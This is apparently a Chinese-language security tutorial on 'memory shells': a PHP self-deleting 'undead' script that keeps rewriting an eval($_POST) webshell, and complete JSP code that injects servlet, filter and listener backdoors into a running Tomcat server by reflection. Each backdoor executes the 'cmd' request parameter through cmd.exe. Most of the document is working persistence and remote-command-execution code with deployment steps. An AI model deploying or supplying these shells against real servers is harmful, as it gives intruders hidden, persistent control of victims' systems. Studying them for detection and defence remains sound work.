内存马

一、php内存马(不死马)

原不死马文件是生成一个一句话木马文件之后,自动删除自身,并且抑制报错

即使删除生成的一句话木马文件
也会不断的继续生成一句话木马文件

除非重启服务,才能停止继续生成

<?php
error_reporting(0);//抑制报错
@unlink(__FILE__);//删除自身
while (true){file_put_contents('./2022_12_15.php', '<?php eval($_POST[12345]);?>');sleep(5);
}

此时我们删除这个文件

可以看到,又生成一个2022_12_15.php文件,这就是所谓的不死马,在内存中不断循环 写入webshell

二、java内存马

java web 三大组件servlet listener filter

1. servlet内存马

<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.Wrapper" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedInputStream" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head><title>$Title$</title>
</head>
<body><%HttpServlet httpServlet = new HttpServlet() {@Overrideprotected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {InputStream is = Runtime.getRuntime().exec(req.getParameter("cmd")).getInputStream();BufferedInputStream bis = new BufferedInputStream(is);int len;while ((len = bis.read())!=-1){resp.getWriter().write(len);}}@Overrideprotected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {super.doPost(req, resp);}};//获得StandardContextField reqF = request.getClass().getDeclaredField("request");reqF.setAccessible(true);Request req = (Request) reqF.get(request);StandardContext stdcontext = (StandardContext) req.getContext();//从StandardContext.createWapper()获得一个Wapper对象Wrapper newWrapper = stdcontext.createWrapper();String name = httpServlet.getClass().getSimpleName();newWrapper.setName(name);newWrapper.setLoadOnStartup(1);newWrapper.setServlet(httpServlet);newWrapper.setServletClass(httpServlet.getClass().getName());//将Wrapper添加到StandardContextstdcontext.addChild(newWrapper);stdcontext.addServletMappingDecoded("/demo", name);%>

如果没有项目的话,或者原项目无法运行,可以这样新建项目

然后再创建文件

我们运行看看,通过访问/demo?cmd= 要执行的命令

2. filter内存马

参考文章了解filter:
https://blog.csdn.net/qq_50652600/article/details/127308348

简单的测试一下filter过滤器的使用

首先,先建立一个filter文件

然后再doFilter方法这里,随便抄点其他的代码,这里主要就是调试的时候,看是否执行代码

response.setContentType("text/html");
PrintWriter out = response.getWriter();
out.println("<html><body>");
out.println("<h1>" + "hello bihuo15" + "</h1>");
out.println("</body></html>");

然后是配置web.xml

<filter><filter-name>bihuo15</filter-name><filter-class>com.hello.springtest.Bihuo15Filter</filter-class>
</filter><filter-mapping><filter-name>bihuo15</filter-name><url-pattern>/bihuo15</url-pattern>
</filter-mapping>

然后打上断点,开启调试

可以看到,当访问/bihuo15,的时候,成功进入断点

全部执行完之后,虽然页面上显示404,没有输出什么内容
但是确确实实是进入了我们的filter过滤器里面执行了代码

那么我们只要将doFIlter方法中的代码替换成执行命令的代码,运行服务器后,就会执行我们想要执行的任何命令

package com.hello.springtest;import javax.servlet.*;
import javax.servlet.annotation.*;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
import java.util.Scanner;@WebFilter(filterName = "Bihuo15Filter")
public class Bihuo15Filter implements Filter {public void init(FilterConfig config) throws ServletException {}public void destroy() {}@Overridepublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain chain) throws ServletException, IOException {// HelloHttpServletRequest request = (HttpServletRequest) servletRequest;if (request.getParameter("c") != null){String[]  command = new String[]{"cmd.exe", "/c", request.getParameter("c")};InputStream inputStream = Runtime.getRuntime().exec(command).getInputStream();Scanner scanner = new Scanner(inputStream).useDelimiter("\\a");String output = scanner.hasNext() ? scanner.next() : "";servletResponse.getWriter().write(output);servletResponse.getWriter().flush();return;}chain.doFilter(servletRequest, servletResponse);}
}

跟我们设想的是一样的,执行了doFIlter方法中的Runtime.getRuntime().exec
造成了命令执行

filter马

下面是一个完整的filter内存马,它不需要创建filter过滤器,也不需要修改web.xml,所有集成都在代码里面写着

<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%><%final String name = "bihuo_new";ServletContext servletContext = request.getSession().getServletContext();Field appctx = servletContext.getClass().getDeclaredField("context");appctx.setAccessible(true);ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);Field stdctx = applicationContext.getClass().getDeclaredField("context");stdctx.setAccessible(true);StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");Configs.setAccessible(true);Map filterConfigs = (Map) Configs.get(standardContext);if (filterConfigs.get(name) == null){Filter filter = new Filter() {@Overridepublic void init(FilterConfig filterConfig) throws ServletException {}@Overridepublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {//这里写上我们后门的主要代码HttpServletRequest req = (HttpServletRequest) servletRequest;if (req.getParameter("cmd") != null){byte[] bytes = new byte[10240];Process process = new ProcessBuilder("cmd.exe","/c",req.getParameter("cmd")).start();int len = process.getInputStream().read(bytes);servletResponse.getWriter().write(new String(bytes,0,len));process.destroy();return;}//别忘记带这个，不然的话其他的过滤器可能无法使用filterChain.doFilter(servletRequest,servletResponse);}@Overridepublic void destroy() {}};FilterDef filterDef = new FilterDef();filterDef.setFilter(filter);filterDef.setFilterName(name);filterDef.setFilterClass(filter.getClass().getName());// 将filterDef添加到filterDefs中standardContext.addFilterDef(filterDef);FilterMap filterMap = new FilterMap();//拦截的路由规则，/* 表示拦截任意路由filterMap.addURLPattern("/*");filterMap.setFilterName(name);filterMap.setDispatcher(DispatcherType.REQUEST.name());standardContext.addFilterMapBefore(filterMap);Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);constructor.setAccessible(true);ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);filterConfigs.put(name,filterConfig);out.print("注入成功");}
%>

主要看下代码的这里,filter需要提供一个路径,上面测试用的/bihuo15
这里写的/*,意思访问任意路径都行

然后就是doFIlter这个核心方法,参数变成了cmd

知道这两点之后,直接运行一下filter_webshell.jsp文件
显示注入成功

然后我们就可以访问任意的文件,根据上面的/*,我这里写的haha,参数是cmd
成功命令执行

3. listener内存马

listener 监听器
参考文章理解listener:
https://blog.csdn.net/weixin_42124497/article/details/114612955

先创建一个listener

在contextInitialized方法中,我们输出一句话
然后运行服务器,打印出来了这句话,证明执行了listener监听器的代码
但是这种只能打印一次,换成无痕的浏览器,或者其它浏览器就不会打印了

我们换到下面得到sessionCreated方法中
发现不同的浏览器,会打印多次
在这里写入内存马,肯定比在上面的方法里面写入要好,可以多次执行

这里因为没有找到合适的代码,所以就先不继续了,web.xml也没配置
其实就和上面的filter一样,先在本地实验了下,然后最后脱离本地,直接用内存马,注入内存中

listener 马

<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%@ page import="java.io.IOException" %><%!public class MyListener implements ServletRequestListener {public void requestDestroyed(ServletRequestEvent sre) {HttpServletRequest req = (HttpServletRequest) sre.getServletRequest();if (req.getParameter("cmd") != null){InputStream in = null;try {in = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",req.getParameter("cmd")}).getInputStream();Scanner s = new Scanner(in).useDelimiter("\\A");String out = s.hasNext()?s.next():"";Field requestF = req.getClass().getDeclaredField("request");requestF.setAccessible(true);Request request = (Request)requestF.get(req);request.getResponse().getWriter().write(out);}catch (IOException e) {}catch (NoSuchFieldException e) {}catch (IllegalAccessException e) {}}}public void requestInitialized(ServletRequestEvent sre) {}}
%><%Field reqF = request.getClass().getDeclaredField("request");reqF.setAccessible(true);Request req = (Request) reqF.get(request);StandardContext context = (StandardContext) req.getContext();MyListener listenerDemo = new MyListener();context.addApplicationEventListener(listenerDemo);
%>

先启动服务器,运行listener_webshell.jsp脚本,注入内存

然后它的访问路径也是任何路径,直接跟cmd参数,命令执行

4. 总结

总结一下,java内存马,直接运行内存马的代码就可以注入内存,实现命令执行

上面我们的实验,比如说filter实验,都需要先在本地配置filter过滤器,配置web.xml,然后运行特定的url,才可以实习命令执行

但是只需要通过filter内存马,先运行一下内存马,然后注入到了内存中,无需本地创建filter过滤器,无需配置web.xml,就可以实现命令执行

常见的java的内存马就是 servlet内存马、filter内存马、listener内存马
对应的java的三大组件 servlet、filter、listener

还有一个java agent内存马,需要用到冰蝎工具
我放到behinder(冰蝎)那章去总结了